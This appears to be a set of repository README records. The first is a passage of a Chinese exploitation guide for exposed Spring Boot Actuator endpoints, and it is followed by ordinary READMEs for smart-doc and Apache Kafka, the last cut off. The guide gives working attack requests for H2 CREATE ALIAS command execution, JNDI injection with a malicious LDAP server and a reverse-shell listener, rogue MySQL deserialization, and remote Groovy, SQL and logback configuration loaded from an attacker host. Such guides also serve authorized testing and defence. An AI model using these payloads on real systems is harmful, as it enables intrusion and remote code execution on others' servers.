`/restart` 接口重启应用 - 存在 `com.h2database.h2` 依赖(版本要求暂未知) #### 利用方法: ##### 步骤一:设置 spring.datasource.hikari.connection-test-query 属性 > ⚠️ 下面payload 中的 'T5' 方法每一次执行命令后都需要更换名称 (如 T6) ,然后才能被重新创建使用,否则下次 restart 重启应用时漏洞不会被触发 spring 1.x(无回显执行命令) ``` POST /env Content-Type: application/x-www-form-urlencoded spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc'); ``` spring 2.x(无回显执行命令) ``` POST /actuator/env Content-Type: application/json {"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"} ``` ##### 步骤二:重启应用 spring 1.x ``` POST /restart Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/restart Content-Type: application/json ``` #### 漏洞原理: 1. spring.datasource.hikari.connection-test-query 属性被设置为一条恶意的 `CREATE ALIAS` 创建自定义函数的 SQL 语句 2. 其属性对应 HikariCP 数据库连接池的 connectionTestQuery 配置,定义一个新数据库连接之前被执行的 SQL 语句 3. restart 重启应用,会建立新的数据库连接 4. 如果 SQL 语句中的自定义函数还没有被执行过,那么自定义函数就会被执行,造成 RCE 漏洞 #### 漏洞分析: ​ [remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) #### 漏洞环境: [repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce) 正常访问: ``` http://127.0.0.1:9096/actuator/env ``` ### 0x07:h2 database console JNDI RCE #### 利用条件: - 存在 `com.h2database.h2` 依赖(版本要求暂未知) - spring 配置中启用 h2 console `spring.h2.console.enabled=true` - 目标可以请求攻击者的服务器(请求可出外网) - JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP 方式) #### 利用方法: ##### 步骤一:访问路由获得 jsessionid 直接访问目标开启 h2 console 的默认路由 `/h2-console`,目标会跳转到页面 `/h2-console/login.jsp?jsessionid=xxxxxx`,记录下实际的 `jsessionid=xxxxxx` 值。 ##### 步骤二:准备要执行的 Java 代码 编写优化过后的用来反弹 shell 的 [Java 示例代码](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/JNDIObject.java) `JNDIObject.java`, 使用兼容低版本 jdk 的方式编译: ```bash javac -source 1.5 -target 1.5 JNDIObject.java ``` 然后将生成的 `JNDIObject.class` 文件拷贝到 **步骤二** 中的网站根目录。 ##### 步骤三:托管 class 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 将**步骤二**中编译好的 class 文件拷贝到 HTTP 服务器根目录。 ##### 步骤四:架设恶意 ldap 服务 下载 [marshalsec](https://github.com/mbechler/marshalsec) ,使用下面命令架设对应的 ldap 服务: ```bash java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389 ``` ##### 步骤五:监听反弹 shell 的端口 一般使用 nc 监听端口,等待反弹 shell ```bash nc -lv 443 ``` ##### 步骤六:发包触发 JNDI 注入 根据实际情况,替换下面数据中的 `jsessionid=xxxxxx`、`www.example.com` 和 `ldap://your-vps-ip:1389/JNDIObject` ```bash POST /h2-console/login.do?jsessionid=xxxxxx Host: www.example.com Content-Type: application/x-www-form-urlencoded Referer: http://www.example.com/h2-console/login.jsp?jsessionid=xxxxxx language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=javax.naming.InitialContext&url=ldap://your-vps-ip:1389/JNDIObject&user=&password= ``` #### 漏洞分析: ​ [Spring Boot + H2数据库JNDI注入](https://mp.weixin.qq.com/s/Yn5U8WHGJZbTJsxwUU3UiQ) #### 漏洞环境: [repository/springboot-h2-database-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-h2-database-rce) 正常访问: ``` http://127.0.0.1:9096/h2-console ``` ### 0x08:mysql jdbc deserialization RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/refresh` 接口刷新配置(存在 `spring-boot-starter-actuator` 依赖) - 目标环境中存在 `mysql-connector-java` 依赖 - 目标可以请求攻击者的服务器(请求可出外网) #### 利用方法: ##### 步骤一:查看环境依赖 GET 请求 `/env` 或 `/actuator/env`,搜索环境变量(classpath)中是否有 `mysql-connector-java` 关键词,并记录下其版本号(5.x 或 8.x); 搜索并观察环境变量中是否存在常见的反序列化 gadget 依赖,比如 `commons-collections`、`Jdk7u21`、`Jdk8u20` 等; 搜索 `spring.datasource.url` 关键词,记录下其 `value` 值,方便后续恢复其正常 jdbc url 值。 ##### 步骤二:架设恶意 rogue mysql server 在自己控制的服务器上运行 [springboot-jdbc-deserialization-rce.py](https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py) 脚本,并使用 [ysoserial](https://github.com/frohoff/ysoserial) 自定义要执行的命令: ```bash java -jar ysoserial.jar CommonsCollections3 calc > payload.ser ``` 在脚本**同目录下**生成 `payload.ser` 反序列化 payload 文件,供脚本使用。 ##### 步骤三:设置 spring.datasource.url 属性 > ⚠️ 修改此属性会暂时导致网站所有的正常数据库服务不可用,会对业务造成影响,请谨慎操作! mysql-connector-java 5.x 版本设置**属性值**为: ``` jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true ``` mysql-connector-java 8.x 版本设置**属性值**为: ``` jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true ``` spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.datasource.url=对应属性值 ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.datasource.url","value":"对应属性值"} ``` ##### 步骤四:刷新配置 spring 1.x ``` POST /refresh Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/refresh Content-Type: application/json ``` ##### 步骤五:触发数据库查询 尝试访问网站已知的数据库查询的接口,例如: `/product/list` ,或者寻找其他方式,主动触发源网站进行数据库查询,然后漏洞会被触发 ##### 步骤六:恢复正常 jdbc url 反序列化漏洞利用完成后,使用 **步骤三** 的方法恢复 **步骤一** 中记录的 `spring.datasource.url` 的原始 `value` 值 #### 漏洞原理: 1. spring.datasource.url 属性被设置为外部恶意 mysql jdbc url 地址 2. refresh 刷新后设置了一个新的 spring.datasource.url 属性值 3. 当网站进行数据库查询等操作时,会尝试使用恶意 mysql jdbc url 建立新的数据库连接 4. 然后恶意 mysql server 就会在建立连接的合适阶段返回反序列化 payload 数据 5. 目标依赖的 mysql-connector-java 就会反序列化设置好的 gadget,造成 RCE 漏洞 #### 漏洞分析: ​ [New-Exploit-Technique-In-Java-Deserialization-Attack](https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf) #### 漏洞环境: > 需要配置 application.properties 中的 spring.datasource.url、spring.datasource.username、spring.datasource.password,保证可以正常连上 mysql 数据库,否则程序启动时就会报错退出 [repository/springboot-mysql-jdbc-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce) 正常访问: ``` http://127.0.0.1:9097/actuator/env ``` 发送完 payload 后触发漏洞: ``` http://127.0.0.1:9097/product/list ``` ### 0x09:restart logging.config logback JNDI RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/restart` 接口重启应用 - 普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过 - ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 - ⚠️ HTTP 服务器如果返回含有畸形 xml 语法内容的文件,会导致程序异常退出 - ⚠️ JNDI 服务返回的 object 需要实现 `javax.naming.spi.ObjectFactory` 接口,否则会导致程序异常退出 #### 利用方法: ##### 步骤一:托管 xml 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在根目录放置以 `xml` 结尾的 `example.xml` 文件,实际内容要根据步骤二中使用的 JNDI 服务来确定: ```xml <configuration> <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/TomcatBypass/Command/Base64/b3BlbiAtYSBDYWxjdWxhdG9y" as="appName" /> </configuration> ``` ##### 步骤二:托管恶意 ldap 服务及代码 参考[文章](https://landgrey.me/blog/21/),修改 [JNDIExploit](https://github.com/feihong-cs/JNDIExploit) 并启动(也可以使用其他方法): ```bash java -jar JNDIExploit-1.0-SNAPSHOT.jar -i your-vps-ip ``` ##### 步骤三:设置 logging.config 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded logging.config=http://your-vps-ip/example.xml ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"logging.config","value":"http://your-vps-ip/example.xml"} ``` ##### 步骤四:重启应用 spring 1.x ``` POST /restart Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/restart Content-Type: application/json ``` #### 漏洞原理: 1. 目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址 2. restart 重启应用后,程序会请求 URL 地址获得恶意 xml 文件内容 3. 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞) 4. xml 文件中利用 `logback` 依赖的 `insertFormJNDI` 标签,设置了外部 JNDI 服务器地址 5. 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞 #### 漏洞分析: ​ [spring boot actuator rce via jolokia](https://xz.aliyun.com/t/4258) ​ https://landgrey.me/blog/21/ #### 漏洞环境: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) 正常访问: ``` http://127.0.0.1:9098/actuator/env ``` ### 0x0A:restart logging.config groovy RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/restart` 接口重启应用 - ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 - ⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出 - ⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出 #### 利用方法: ##### 步骤一:托管 groovy 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在根目录放置以 `groovy` 结尾的 `example.groovy` 文件,内容为需要执行的 groovy 代码,比如: ```xml Runtime.getRuntime().exec("open -a Calculator") ``` ##### 步骤二:设置 logging.config 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded logging.config=http://your-vps-ip/example.groovy ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"logging.config","value":"http://your-vps-ip/example.groovy"} ``` ##### 步骤三:重启应用 spring 1.x ``` POST /restart Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/restart Content-Type: application/json ``` #### 漏洞原理: 1. 目标机器通过 logging.config 属性设置 logback 日志配置文件 URL 地址 2. restart 重启应用后,程序会请求设置的 URL 地址 3. `logback-classic` 组件的 `ch.qos.logback.classic.util.ContextInitializer.java` 代码文件逻辑中会判断 url 是否以 `groovy` 结尾 4. 如果 url 以 `groovy` 结尾,则最终会执行文件内容中的 groovy 代码,造成 RCE 漏洞 #### 漏洞环境: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) 正常访问: ``` http://127.0.0.1:9098/actuator/env ``` ### 0x0B:restart spring.main.sources groovy RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/restart` 接口重启应用 - ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 - ⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出 - ⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出 #### 利用方法: ##### 步骤一:托管 groovy 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在根目录放置以 `groovy` 结尾的 `example.groovy` 文件,内容为需要执行的 groovy 代码,比如: ```xml Runtime.getRuntime().exec("open -a Calculator") ``` ##### 步骤二:设置 spring.main.sources 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.main.sources=http://your-vps-ip/example.groovy ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.main.sources","value":"http://your-vps-ip/example.groovy"} ``` ##### 步骤三:重启应用 spring 1.x ``` POST /restart Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/restart Content-Type: application/json ``` #### 漏洞原理: 1. 目标机器可以通过 spring.main.sources 属性来设置创建 ApplicationContext 的额外源的 URL 地址 2. restart 重启应用后,程序会请求设置的 URL 地址 3. `spring-boot` 组件中的 `org.springframework.boot.BeanDefinitionLoader.java` 文件代码逻辑中会判断 url 是否以 `.groovy` 结尾 4. 如果 url 以 `.groovy` 结尾,则最终会执行文件内容中的 groovy 代码,造成 RCE 漏洞 #### 漏洞环境: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) 正常访问: ``` http://127.0.0.1:9098/actuator/env ``` ### 0x0C:restart spring.datasource.data h2 database RCE #### 利用条件: - 可以 POST 请求目标网站的 `/env` 接口设置属性 - 可以 POST 请求目标网站的 `/restart` 接口重启应用 - 环境中需要存在 `h2database`、`spring-boot-starter-data-jpa` 相关依赖 - ⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出 - ⚠️ HTTP 服务器如果返回含有畸形 h2 sql 语法内容的文件,会导致程序异常退出 #### 利用方法: ##### 步骤一:托管 sql 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) ```bash # 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 ``` 在根目录放置以任意名字的文件,内容为需要执行的 h2 sql 代码,比如: > ⚠️ 下面payload 中的 'T5' 方法只能 restart 执行一次;后面 restart 需要更换新的方法名称 (如 T6) 和设置新的 sql URL 地址,然后才能被 restart 重新使用,否则第二次 restart 重启应用时会导致程序异常退出 ```xml CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('/bin/bash','-c','open -a Calculator'); ``` ##### 步骤二:设置 spring.datasource.data 属性 spring 1.x ``` POST /env Content-Type: application/x-www-form-urlencoded spring.datasource.data=http://your-vps-ip/example.sql ``` spring 2.x ``` POST /actuator/env Content-Type: application/json {"name":"spring.datasource.data","value":"http://your-vps-ip/example.sql"} ``` ##### 步骤三:重启应用 spring 1.x ``` POST /restart Content-Type: application/x-www-form-urlencoded ``` spring 2.x ``` POST /actuator/restart Content-Type: application/json ``` #### 漏洞原理: 1. 目标机器可以通过 spring.datasource.data 属性来设置 jdbc DML sql 文件的 URL 地址 2. restart 重启应用后,程序会请求设置的 URL 地址 3. `spring-boot-autoconfigure` 组件中的 `org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer.java` 文件代码逻辑中会使用 `runScripts` 方法执行请求 URL 内容中的 h2 database sql 代码,造成 RCE 漏洞 #### 漏洞环境: [repository/springboot-restart-rce](https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce) 正常访问: ``` http://127.0.0.1:9098/actuator/env ```
0
TongchengOpenSource/smart-doc
Smart-doc is a java restful api document generation tool. Smart-doc is based on interface source code analysis to generate interface documentation, completely zero-injection.
null
<h1 align="center">Smart-Doc Project</h1> ![maven](https://img.shields.io/maven-central/v/com.ly.smart-doc/smart-doc) [![License](https://img.shields.io/badge/license-Apache%202-green.svg)](https://www.apache.org/licenses/LICENSE-2.0) ![number of issues closed](https://img.shields.io/github/issues-closed-raw/smart-doc-group/smart-doc) ![closed pull requests](https://img.shields.io/github/issues-pr-closed/smart-doc-group/smart-doc) ![java version](https://img.shields.io/badge/JAVA-1.8+-green.svg) [![chinese](https://img.shields.io/badge/chinese-中文文档-brightgreen)](https://smart-doc-group.github.io/#/zh-cn/) ![gitee star](https://gitee.com/smart-doc-team/smart-doc/badge/star.svg) ![git star](https://img.shields.io/github/stars/smart-doc-group/smart-doc.svg) ## Introduce `smart-doc[smɑːt dɒk]`is a tool that supports both `JAVA REST API` and `JAVA WebSocket` and `Apache Dubbo RPC` interface document generation. `Smart-doc` is based on interface source code analysis to generate interface documents, and zero annotation intrusion. You only need to write Javadoc comments when developing, `smart-doc` can help you generate `Markdown` or `HTML5` document. `smart-doc` does not need to inject annotations into the code like `Swagger`. [quick start](https://smart-doc-group.github.io/#/) ## Documentation * [English](https://smart-doc-group.github.io/#/) * [中文](https://smart-doc-group.github.io/#/zh-cn/) ## Features - Zero annotation, zero learning cost, only need to write standard `JAVA` document comments. - Automatic derivation based on source code interface definition, powerful return structure derivation support. - Support `Spring MVC`, `Spring Boot`, `Spring Boot Web Flux` (Not support endpoint), `Feign`,`JAX-RS`. - Supports the derivation of asynchronous interface returns such as `Callable`, `Future`, `CompletableFuture`. - Support `JSR-303`parameter verification specification. - Support for automatic generation of request examples based on request parameters. - Support for generating `JSON` return value examples. - Support for loading source code from outside the project to generate field comments (including the sources jar package). - Support for generating multiple formats of documents: `Markdown`,`HTML5`,`Word`,`Asciidoctor`,`Postman Collection 2.0+`,`OpenAPI 3.0`. - Support the generation of `Jmeter` performance testing scripts - Support for exporting error codes and data dictionary codes to API documentation. - The debug html5 page fully supports file upload and download testing. - Support `Apache Dubbo RPC`. ## Best Practice `smart-doc` + [Torna](http://torna.cn) form an industry-leading document generation and management solution, using `smart-doc` to complete Java source code analysis and extract annotations to generate API documents without intrusion, and automatically push the documents to the `Torna` enterprise-level interface document management platform. ![smart-doc+torna](https://raw.githubusercontent.com/shalousun/smart-doc/master/images/smart-doc-torna-en.png) ## Building You could build with the following commands. (`JDK 1.8` is required to build the master branch) ``` mvn clean install -Dmaven.test.skip=true ``` ## TODO - GRPC ## Who is using These are only part of the companies using `smart-doc`, for reference only. If you are using smart-doc, please [add your company here](https://github.com/smart-doc-group/smart-doc/issues/12) to tell us your scenario to make `smart-doc` better. ![IFLYTEK](https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/iflytek.png) &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/oneplus.png" title="一加" > &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/xiaomi.png" title="小米" > &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/shunfeng.png" title="顺丰"> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/ly.jpeg" title="同程旅行" width="160px" height="70px"/> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/kuishou.png" title="快手"> &nbsp;&nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/mafengwo.png" title="马蜂窝"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yunda.png" title="韵达速递" width="192px" height="64px"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/zhongtongzhiyun.png" title="中通智运"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/tcsklogo.jpeg" title="同程数科" width="170px" height="64px"/> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/flipboard.png" title="红板报"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/dianxin.png" title="中国电信"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yidong.png" title="中国移动"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/neusoft.png" title="东软集团"> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/zhongkezhilian.png" title="中科智链" width="240px" height="64px"/> &nbsp;&nbsp;<img src="https://www.hand-china.com/static/img/hand-logo.svg" title="上海汉得信息技术股份有限公司" width="240px" height="64px"/> &nbsp;&nbsp;<img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/known-users/yuanmengjiankang.png" title="远盟健康" width="230px" height="64px"/> ## Acknowledgements Thanks to [JetBrains SoftWare](https://www.jetbrains.com) for providing free Open Source license for this project. <img src="https://raw.githubusercontent.com/smart-doc-group/smart-doc/master/images/jetbrains-variant-3.png" width="260px" height="220px"/> ## License `Smart-doc` is under the Apache 2.0 license. See the [LICENSE](https://github.com/smart-doc-group/smart-doc/blob/master/LICENSE) file for details. ## Contact Email: opensource@ly.com
0
apache/kafka
Mirror of Apache Kafka
kafka scala
Apache Kafka ================= See our [web site](https://kafka.apache.org) for details on the project. You need to have [Java](http://www.oracle.com/technetwork/java/javase/downloads/index.html) installed. We build and test Apache Kafka with Java 8, 11, 17 and 21. We set the `release` parameter in javac and scalac to `8` to ensure the generated binaries are compatible with Java 8 or higher (independently of the Java version used for compilation). Java 8 support project-wide has been deprecated since Apache Kafka 3.0, Java 11 support for the broker and tools has been deprecated since Apache Kafka 3.7 and removal of both is planned for Apache Kafka 4.0 ( see [KIP-750](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308223) and [KIP-1013](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=284789510) for more details). Scala 2.12 and 2.13 are supported and 2.13 is used by default. Scala 2.12 support has been deprecated since Apache Kafka 3.0 and will be removed in Apache Kafka 4.0 (see [KIP-751](https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=181308218) for more details). See below for how to use a specific Scala version or all of the supported Scala versions. ### Build a jar and run it ### ./gradlew jar Follow instructions in https://kafka.apache.org/quickstart ### Build source jar ### ./gradlew srcJar ### Build aggregated javadoc ### ./gradlew aggregatedJavadoc ### Build javadoc and scaladoc ### ./gradlew javadoc ./gradlew javadocJar # builds a javadoc jar for each module ./gradlew scaladoc ./gradlew scaladocJar # builds a scaladoc jar for each module ./gradlew docsJar # builds both (if applicable) javadoc and scaladoc jars for each module ### Run unit/integration tests ### ./gradlew test # runs both unit and integration tests ./gradlew unitTest ./gradlew integrationTest ### Force re-running tests without code change ### ./gradlew test --rerun ./gradlew unitTest --rerun ./gradlew integrationTest --rerun ### Running a particular unit/integration test ### ./gradlew clients:test --tests RequestResponseTest ### Repeatedly running a particular unit/integration test ### I=0; while ./gradlew clients:test --tests RequestResponseTest --rerun --fail-fast; do (( I=$I+1 )); echo "Completed run: $I"; sleep 1; done ### Running a particular test method within a unit/integration test ### ./gradlew core:test --tests kafka.api.ProducerFailureHandlingTest.testCannotSendToInternalTopic ./gradlew clients:test --tests org.apache.kafka.clients.MetadataTest.testTimeToNextUpdate ### Running a particular unit/integration test with log4j output ### By default, there will be only small number of logs output while testing. You can adjust it by changing the `log4j.properties` file in the module's `src/test/resources` directory. For example, if you want to see more logs for clients project tests, you can modify [the line](https://github.com/apache/kafka/blob/trunk/clients/src/test/resources/log4j.properties#L21) in `clients/src/test/resources/log4j.properties` to `log4j.logger.org.apache.kafka=INFO` and then run: ./gradlew cleanTest clients:test --tests NetworkClientTest And you should see `INFO` level logs in the file under the `clients/build/test-results/test` directory. ### Specifying test retries ### By default, each failed test is retried once up to a maximum of five retries per test run. Tests are retried at the end of the test task. Adjust these parameters in the following way: ./gradlew test -PmaxTestRetries=1 -PmaxTestRetryFailures=5 See [Test Retry Gradle Plugin](https://github.com/gradle/test-retry-gradle-plugin) for more details. ### Generating test coverage reports ### Generate coverage reports for the whole project: ./gradlew reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false Generate coverage for a single module, i.e.: ./gradlew clients:reportCoverage -PenableTestCoverage=true -Dorg.gradle.parallel=false ### Building a binary release gzipped tar ball ### ./gradlew clean releaseTarGz The release file can be found inside `./core/build/distributions/`. ### Building auto generated messages ### Sometimes it is only necessary to rebuild the RPC auto-generated message data when switching between branches, as they could fail due to code changes. You can just run: ./gradlew processMessages processTestMessages ### Running a Kafka broker in KRaft mode Using compiled files: KAFKA_CLUSTER_ID="$(./bin/kafka-storage.sh random-uuid)" ./bin/kafka-storage.sh format -t $KAFKA_CLUSTER_ID -c config/kraft/server.properties ./bin/kafka-server-start.sh config/kraft/server.properties Using docker image: docker run -p 9092:9092 apache/kafka:3.7.0 ### Running a Kafka broker in ZooKeeper mode Using compiled files: ./bin/zookeeper-server-start.sh config/zookeeper.properties ./bin/kafka-server-start.sh config/server.properties >Since ZooKeeper mode is already deprecated and planned to be removed in Apache Kafka 4.0, the docker image only supports running in KRaft mode ### Cleaning the build ### ./gradlew clean ### Running a task with one of the Scala versions available (2.12.x or 2.13.x) ### *Note that if building the jars with a version other than 2.13.x, you need to set the `SCALA_VERSION` variable or change it in `bin/kafka-run-class.sh` to run the quick start.* You can pass either the major version (eg 2.12) or the full version (eg 2.12.7): ./gradlew -PscalaVersion=2.12 jar ./gradlew -PscalaVersion=2.12 test ./gradlew -PscalaVersion=2.12 releaseTarGz ### Running a task with all the scala versions enabled by default ### Invoke the `gradlewAll` script followed by the task(s): ./gradlewAll test ./gradlewAll jar ./gradlewAll releaseTarGz ### Running a task for a specific project ### This is for `core`, `examples` and `clients` ./gradlew core:jar ./gradlew core:test Streams has multiple sub-projects, but you can run all the tests: ./gradlew :streams:testAll ### Listing all gradle tasks ### ./gradlew tasks ### Building IDE project #### *Note that this is not strictly necessary (IntelliJ IDEA has good built-in support for Gradle projects, for example).* ./gradlew eclipse ./gradlew idea The `eclipse` task has been configured to use `${project_dir}/build_eclipse` as Eclipse's build directory. Eclipse's default build directory (`${project_dir}/bin`) clashes with Kafka's scripts directory and we don't use Gradle's build directory to avoid known issues with this configuration. ### Publishing the jar for all versions of Scala and for all projects to maven ### The recommended command is: ./gradlewAll publish For backwards compatibility, the following also works: ./gradlewAll uploadArchives Please note for this to work you should create/update `${GRADLE_USER_HOME}/gradle.properties` (typically, `~/.gradle/gradle.properties`) and assign the following variables mavenUrl= mavenUsername= mavenPassword= signing.keyId= signing.password= signing.secretKeyRingFile= ### Publishing the streams quickstart archetype artifact to maven ### For the Streams archetype project, one cannot use gradle to upload to maven; instead the `mvn deploy` command needs to be called at the quickstart folder: cd streams/quickstart mvn deploy Please note for this to work you should create/update user maven settings (typically, `${USER_HOME}/.m2/settings.xml`) to assign the following variables <settings xmlns="http://maven.apache.org/SETTINGS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0 https://maven.apache.org/xsd/settings-1.0.0.xsd"> ... <servers> ... <server> <id>apache.snapshots.https</id> <username>${maven_username}</username> <password>${maven_password}</password> </server> <server> <id>apache.releases.https</id> <username>${maven_username}</username> <password>${maven_password}</password> </server> ... </servers> ... ### Installing ALL the jars to the local Maven repository ### The recommended command to build for both Scala 2.12 and 2.13 is: ./gradlewAll publishToMavenLocal For backwards compatibility, the following also works: ./gradlewAll install ### Installing specific projects to the local Maven repository ### ./gradlew -PskipSigning=true :streams:publishToMavenLocal If needed, you can specify the Scala version with `-PscalaVersion=2.13`. ### Building the test jar ### ./gradlew testJar ### Running code quality checks ### There are two code quality analysis tools that we regularly run, spotbugs and checkstyle. #### Checkstyle #### Checkstyle enforces a consistent coding style in Kafka. You can run checkstyle using: ./gradlew checkstyleMain checkstyleTest The checkstyle warnings will be found in `reports/checkstyle/reports/main.html` and `reports/checkstyle/reports/test.html` files in the subproject build directories. They are also printed to the console. The build will fail if Checkstyle fails. #### Spotbugs #### Spotbugs uses static analysis to look for bugs in the code. You can run spotbugs using: ./gradlew spotbugsMain spotbugsTest -x test The spotbugs warnings will be found in `reports/spotbugs/main.html` and `reports/spotbugs/test.html` files in the subproject build directories. Use -PxmlSpotBugsReport=true to generate an XML report instead of an HTML one. ### JMH microbenchmarks ### We use [JMH](https://openjdk.java.net/projects/code-tools/jmh/) to write microbenchmarks that produce reliable results in the JVM. See [jmh-benchmarks/README.md](https://github.com/apache/kafka/blob/trunk/jmh-benchmarks/README.md) for details on how to run the microbenchmarks. ### Dependency Analysis ### The gradle [dependency debugging 